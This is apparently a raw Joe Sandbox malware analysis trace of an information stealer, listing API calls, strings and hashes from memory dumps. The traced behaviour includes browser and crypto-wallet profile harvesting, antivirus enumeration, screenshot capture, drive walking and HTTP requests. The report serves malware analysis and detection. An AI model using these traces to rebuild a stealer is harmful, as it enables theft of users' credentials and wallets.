                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                                                              • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009269C5
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 009269DF
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926A0E
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00926A4D
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926A7D
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00926A88
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00926AAC
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,000007CF,?), ref: 00926B40
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926B50
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926B5C
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926B68
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                              • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00931973
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000030,00933FA7,?,AV: ,009568CC,Install Date: ,009568B8,00000000,Windows: ,009568A8,Work Dir: In memory,00956890), ref: 00931982
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00931993
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00952F00,00000000,00000001,00952E30,?), ref: 009319AD
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009319E3
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00931A32
                                                                                                                                                                                                                • Part of subcall function 00931D17: LocalAlloc.KERNEL32(00000040,00000005,?,?,00931A55,?), ref: 00931D1F
                                                                                                                                                                                                                • Part of subcall function 00931D17: CharToOemW.USER32(?,00000000), ref: 00931D2B
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00931A60
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                              • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                              • API String ID: 4288110179-315474579
                                                                                                                                                                                                              • Opcode ID: 299feba09b3a39153b87f38de37d325ce2f23cde853cbb009136bfda6f239ffd
                                                                                                                                                                                                              • Instruction ID: a4c20861b3c1dcd803c2bd9210fadbb4feba879289155a51e7d6ea80804f3f8a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 299feba09b3a39153b87f38de37d325ce2f23cde853cbb009136bfda6f239ffd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72313C71A04309BBCB20DBA6DC49EAFBFBDEFC5B12F104509F521A61E0D6745A01CB20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00931F6B
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00931F79
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00931F86
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00931F8D
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00931F96
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00931FA6
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00931FB3
                                                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00931FCF
                                                                                                                                                                                                              • GetHGlobalFromStream.COMBASE(?,?), ref: 0093201E
                                                                                                                                                                                                              • GlobalLock.KERNEL32(?), ref: 00932027
                                                                                                                                                                                                              • GlobalSize.KERNEL32(?), ref: 00932033
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00925482: lstrlenA.KERNEL32(?), ref: 00925519
                                                                                                                                                                                                                • Part of subcall function 00925482: StrCmpCA.SHLWAPI(?,00956976,0095695B,00956957,0095694B), ref: 00925588
                                                                                                                                                                                                                • Part of subcall function 00925482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009255AA
                                                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00932091
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 009320AC
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 009320B5
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 009320BD
                                                                                                                                                                                                              • CloseWindow.USER32(00000000), ref: 009320C4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2610876673-0
                                                                                                                                                                                                              • Opcode ID: 3df524547daba44035bae364c689ed83dd033085bf1749ef80964449f55a1f59
                                                                                                                                                                                                              • Instruction ID: 5230ba11d9ee6c1016d9d77f2cb2399cc4e75330d12da6da57f655d77a1eccb8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3df524547daba44035bae364c689ed83dd033085bf1749ef80964449f55a1f59
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E551E272800118AFDB11AFA0ED499EEBF79FF48314B044465F919E7120DB309A99DFA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,0095AA54,0095AA58,009569EE,009569EB,00937A94,?,00000000), ref: 00921FA4
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095AA5C), ref: 00921FD7
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095AA60), ref: 00921FF1
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,0095AA64,0095AA68,?,0095AA6C,009569EF), ref: 009220DD
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 009222C3
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00922336
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 009223A2
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 009223B6
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 009225DC
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092264F
                                                                                                                                                                                                                • Part of subcall function 00937023: Sleep.KERNEL32(000003E8,?,?), ref: 0093708A
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 009226C6
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 009226DA
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00931D67: GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 1475085387-1173974218
                                                                                                                                                                                                              • Opcode ID: 066d7a53e417de63e1d3366371dc7e8fca81776c18c6d2b9ab07ba9bc43c590c
                                                                                                                                                                                                              • Instruction ID: b5e34fa3dc86071a6b72445ea3d2cb689ece928d20fdbd4a780da27125690d00
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 066d7a53e417de63e1d3366371dc7e8fca81776c18c6d2b9ab07ba9bc43c590c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D432C2359501299BCB21FB25ED56BCDB779AF84300F4141E1B948B716ADB70AFCA8F80
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 009354AA
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 009354C1
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956A88), ref: 009354E2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956A8C), ref: 009354FC
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 0093554D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935560
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935574
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935587
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956A90), ref: 00935599
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 009355AD
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 00935663
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00935677
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                              • API String ID: 1150833511-4073750446
                                                                                                                                                                                                              • Opcode ID: b92ee8c52f00a5e1d22f6022045cc11ffb565bad42fa6d1bb39896e43801fba5
                                                                                                                                                                                                              • Instruction ID: 2ae679bfa845a23c37e2a7c1060fa20d655d9e3d6d15eda3f54cad977f288bfc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b92ee8c52f00a5e1d22f6022045cc11ffb565bad42fa6d1bb39896e43801fba5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF51F6B190022C9BDF60DF64DC89AC9B7BCAF49315F4045E5A60DE3250EB31AB89CF65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,\*.*,0095682E,0092CC40,?,?), ref: 0092BF9A
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957468), ref: 0092BFBA
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095746C), ref: 0092BFD4
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera,0095683B,0095683A,00956837,00956836,00956833,00956832,0095682F), ref: 0092C060
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0092C06E
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0092C07C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                              • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                              • API String ID: 2567437900-1710495004
                                                                                                                                                                                                              • Opcode ID: a8ea90f94f536c707bff68b65e76450d9b1e59429b34b7de27a91d292f71fba3
                                                                                                                                                                                                              • Instruction ID: a978e0aae5aed41c8a310c465349f8b70d5b31767a0cb60e496bd95f999bcb35
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8ea90f94f536c707bff68b65e76450d9b1e59429b34b7de27a91d292f71fba3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E402E336950129ABCB21FB25ED56BDDB775AF84304F4141E1B948B712ADB30AFC98F80
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00935202
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00935225
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 0093522E
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 0093524E
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 00935269
                                                                                                                                                                                                                • Part of subcall function 00934D08: wsprintfA.USER32 ref: 00934D5C
                                                                                                                                                                                                                • Part of subcall function 00934D08: FindFirstFileA.KERNEL32(?,?), ref: 00934D73
                                                                                                                                                                                                                • Part of subcall function 00934D08: _memset.LIBCMT ref: 00934D8F
                                                                                                                                                                                                                • Part of subcall function 00934D08: _memset.LIBCMT ref: 00934DA0
                                                                                                                                                                                                                • Part of subcall function 00934D08: StrCmpCA.SHLWAPI(?,00956A00), ref: 00934DC1
                                                                                                                                                                                                                • Part of subcall function 00934D08: StrCmpCA.SHLWAPI(?,00956A04), ref: 00934DDB
                                                                                                                                                                                                                • Part of subcall function 00934D08: wsprintfA.USER32 ref: 00934E02
                                                                                                                                                                                                                • Part of subcall function 00934D08: StrCmpCA.SHLWAPI(?,0095660F), ref: 00934E16
                                                                                                                                                                                                                • Part of subcall function 00934D08: wsprintfA.USER32 ref: 00934E3F
                                                                                                                                                                                                                • Part of subcall function 00934D08: _memset.LIBCMT ref: 00934E68
                                                                                                                                                                                                                • Part of subcall function 00934D08: lstrcatA.KERNEL32(?,?), ref: 00934E7D
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 0093528A
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00935304
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                              • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                              • API String ID: 441469471-147700698
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,00957568,00956887,?,?,?), ref: 0092D61C
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095756C), ref: 0092D63D
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957570), ref: 0092D657
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,prefs.js,00957574,?,0095688F), ref: 0092D6E3
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092D7BD
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092D888
                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 0092D92B
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092D93F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                              • String ID: prefs.js
                                                                                                                                                                                                              • API String ID: 893096357-3783873740
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,0095741C,00956822,?,?,?), ref: 0092B62C
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957420), ref: 0092B64D
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957424), ref: 0092B667
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957428,?,00956823), ref: 0092B6F4
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092B755
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 0092ABBA: CopyFileA.KERNEL32(?,?,00000001), ref: 0092AC5F
                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 0092B8C0
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092B8D4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3801961486-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00932487
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009324A9
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 009324B9
